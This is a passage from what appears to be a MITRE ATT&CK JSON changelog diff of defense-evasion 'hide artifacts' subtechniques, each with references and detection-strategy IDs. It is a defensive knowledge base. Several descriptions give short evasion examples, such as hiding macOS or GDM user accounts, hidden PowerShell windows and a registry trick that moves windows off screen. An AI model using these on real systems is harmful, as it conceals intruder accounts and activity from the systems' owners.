+                    "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls \u2013a</code> for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdditionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a \u201cspace\u201d character.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/001",
+                            "external_id": "T1564.001"
+                        },
+                        {
+                            "source_name": "WireLurker",
+                            "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.",
+                            "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
+                        },
+                        {
+                            "source_name": "Sofacy Komplex Trojan",
+                            "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
+                        },
+                        {
+                            "source_name": "Antiquated Mac Malware",
+                            "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gr@ve_Rose (tcpdump101.com on bsky)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 20:23:13.914000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0032: Detection Strategy for Hidden Files and Directories"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:12:40.876000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Hidden Users",
+                    "description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. \n\nIn macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user\u2019s home folder by changing the <code>chflags</code> to hidden.(Citation: Apple Support Hide a User Account) \n\nAdversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)\n\nOn Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/002",
+                            "external_id": "T1564.002"
+                        },
+                        {
+                            "source_name": "Cybereason OSX Pirrit",
+                            "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.",
+                            "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
+                        },
+                        {
+                            "source_name": "Apple Support Hide a User Account",
+                            "description": "Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.",
+                            "url": "https://support.apple.com/en-us/HT203998"
+                        },
+                        {
+                            "source_name": "FireEye SMOKEDHAM June 2021",
+                            "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"
+                        },
+                        {
+                            "source_name": "Hide GDM User Accounts",
+                            "description": "Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.",
+                            "url": "https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/"
+                        },
+                        {
+                            "source_name": "US-CERT TA18-074A",
+                            "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Omkar Gudhate"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2026-04-15 20:23:44.205000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0353: Detection Strategy for Hidden User Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:26:49.433000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "Hidden Window",
+                    "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)\n\nThe Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.\n\nAdversaries may also leverage cmd.exe(Citation: Cybereason - Hidden Malicious Remote Access) as a parent process, and then utilize a LOLBin, such as DeviceCredentialDeployment.exe,(Citation: LOLBAS Project GitHub Device Cred Dep)(Citation: SecureList BlueNoroff Device Cred Dev) to hide windows.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/003",
+                            "external_id": "T1564.003"
+                        },
+                        {
+                            "source_name": "Cantoris Computing",
+                            "description": "Cantoris. (2016, July 22). PowerShell Malware. Retrieved December 12, 2024.",
+                            "url": "https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/"
+                        },
+                        {
+                            "source_name": "Cybereason - Hidden Malicious Remote Access",
+                            "description": "Cybereason Security Services Team. (n.d.). Behind Closed Doors: The Rise of Hidden Malicious Remote Access. Retrieved July 22, 2025.",
+                            "url": "https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access"
+                        },
+                        {
+                            "source_name": "LOLBAS Project GitHub Device Cred Dep",
+                            "description": "Elliot Killick. (n.d.). /DeviceCredentialDeployment.exe. Retrieved July 22, 2025.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"
+                        },
+                        {
+                            "source_name": "Hidden VNC",
+                            "description": "Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners. Retrieved November 28, 2023.",
+                            "url": "https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html"
+                        },
+                        {
+                            "source_name": "Anatomy of an hVNC Attack",
+                            "description": "Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an hVNC Attack. Retrieved November 28, 2023.",
+                            "url": "https://securityintelligence.com/anatomy-of-an-hvnc-attack/"
+                        },
+                        {
+                            "source_name": "SecureList BlueNoroff Device Cred Dev",
+                            "description": "Seongsu Park. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved July 22, 2025.",
+                            "url": "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
+                        },
+                        {
+                            "source_name": "Antiquated Mac Malware",
+                            "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
+                        },
+                        {
+                            "source_name": "PowerShell About 2019",
+                            "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps",
+                        "Mark Tsipershtein",
+                        "Travis Smith, Tripwire",
+                        "Vijay Lalwani"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-15 20:23:51.965000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1033: Limit Software Installation",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0128: Detection Strategy for Hidden Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-08-24 17:23:34.470000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Ignore Process Interrupts",
+                    "description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/011",
+                            "external_id": "T1564.011"
+                        },
+                        {
+                            "source_name": "Linux Signal Man",
+                            "description": "Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.",
+                            "url": "https://man7.org/linux/man-pages/man7/signal.7.html"
+                        },
+                        {
+                            "source_name": "nohup Linux Man",
+                            "description": "Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.",
+                            "url": "https://linux.die.net/man/1/nohup"
+                        },
+                        {
+                            "source_name": "Microsoft PowerShell SilentlyContinue",
+                            "description": "Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.",
+                            "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Viren Chaudhari, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2026-04-15 20:24:37.027000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0067: Detection Strategy for Ignore Process Interrupts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-13 20:33:00.009000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "NTFS File Attributes",
+                    "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/004",
+                            "external_id": "T1564.004"
+                        },
+                        {
+                            "source_name": "MalwareBytes ADS July 2015",
+                            "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.",
+                            "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"
+                        },
+                        {
+                            "source_name": "SpectorOps Host-Based Jul 2017",
+                            "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.",
+                            "url": "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea"
+                        },
+                        {
+                            "source_name": "Journey into IR ZeroAccess NTFS EA",
+                            "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.",
+                            "url": "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html"
+                        },
+                        {
+                            "source_name": "Microsoft NTFS File Attributes Aug 2010",
+                            "description": "Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.",
+                            "url": "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/"
+                        },
+                        {
+                            "source_name": "Microsoft ADS Mar 2014",
+                            "description": "Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.",
+                            "url": "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/"
+                        },
+                        {
+                            "source_name": "Microsoft File Streams",
+                            "description": "Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Oddvar Moe, @oddvarmoe",
+                        "Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2026-04-15 20:24:50.745000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0432: Detection Strategy for NTFS File Attribute Abuse (ADS/EAs)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-11-19 14:13:11.335000+00:00",
+                    "modified": "2026-05-12 15:12:00.727000+00:00",
+                    "name": "Process Argument Spoofing",
+                    "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/010",
+                            "external_id": "T1564.010"
+                        },
+                        {
+                            "source_name": "Xpn Argue Like Cobalt 2019",
+                            "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.",
+                            "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/"
+                        },
+                        {
+                            "source_name": "Nviso Spoof Command Line 2020",
+                            "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.",
+                            "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/"
+                        },
+                        {
+                            "source_name": "FireEye FiveHands April 2021",
+                            "description": "McLellan, T.  and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+                        },
+                        {
+                            "source_name": "Microsoft PEB 2021",
+                            "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb"
+                        },
+                        {
+                            "source_name": "Cobalt Strike Arguments 2019",
+                            "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.",
+                            "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.727000+00:00\", \"old_value\": \"2026-04-15 20:25:25.946000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0045: Detection Strategy for Process Argument Spoofing on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-12 20:02:31.866000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Resource Forking",
+                    "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file\u2019s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1564/009",
+                            "external_id": "T1564.009"
+                        },
+                        {
+                            "source_name": "tau bundlore erika noerenberg 2020",
+                            "description": "Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.",
+                            "url": "https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html"
+                        },
+                        {
+                            "source_name": "Resource and Data Forks",
+                            "description": "Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.",
+                            "url": "https://flylib.com/books/en/4.395.1.192/1/"
+                        },
+                        {
+                            "source_name": "ELC Extended Attributes",
+                            "description": "Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.",
+                            "url": "https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/"
+                        },
+                        {
+                            "source_name": "sentinellabs resource named fork 2020",
+                            "description": "Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.",
+                            "url": "https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/"
+                        },
+                        {
